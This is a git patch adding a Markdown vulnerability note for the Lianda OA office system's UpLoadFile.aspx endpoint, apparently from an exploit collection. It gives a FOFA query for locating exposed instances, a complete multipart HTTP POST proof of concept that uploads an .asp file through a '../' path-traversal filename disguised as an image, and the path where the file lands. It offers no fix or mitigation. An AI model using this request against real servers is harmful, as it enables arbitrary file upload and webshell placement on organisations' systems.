From 52c08e76226077b6132cf285f479eac634598b08 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 28 Mar 2024 19:26:58 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E8=81=94=E8=BE=BEOA-UpLoadFile.aspx?= =?UTF-8?q?=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8A?= =?UTF-8?q?=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md diff --git a/联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md b/联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md new file mode 100644 index 0000000..8fb57de --- /dev/null +++ b/联达OA-UpLoadFile.aspx存在任意文件上传漏洞.md @@ -0,0 +1,33 @@ +## 联达OA-UpLoadFile.aspx存在任意文件上传漏洞 + +## fofa +``` +app="联达OA" +``` + +## poc +``` +POST /FileManage/UpLoadFile.aspx HTTP/1.1 +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.1707.77 Safari/537.36 +Content-Type: multipart/form-data; boundary=00content0boundary00 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 241 +Connection: close + +--00content0boundary00 +Content-Disposition: form-data; name="DesignId" + +1 +--00content0boundary00 +Content-Disposition: form-data; name="file"; filename="../test.asp" +Content-Type: image/png + +test +--00content0boundary00-- +``` + +文件路径: +``` +http://ip/FileManage/test.asp +```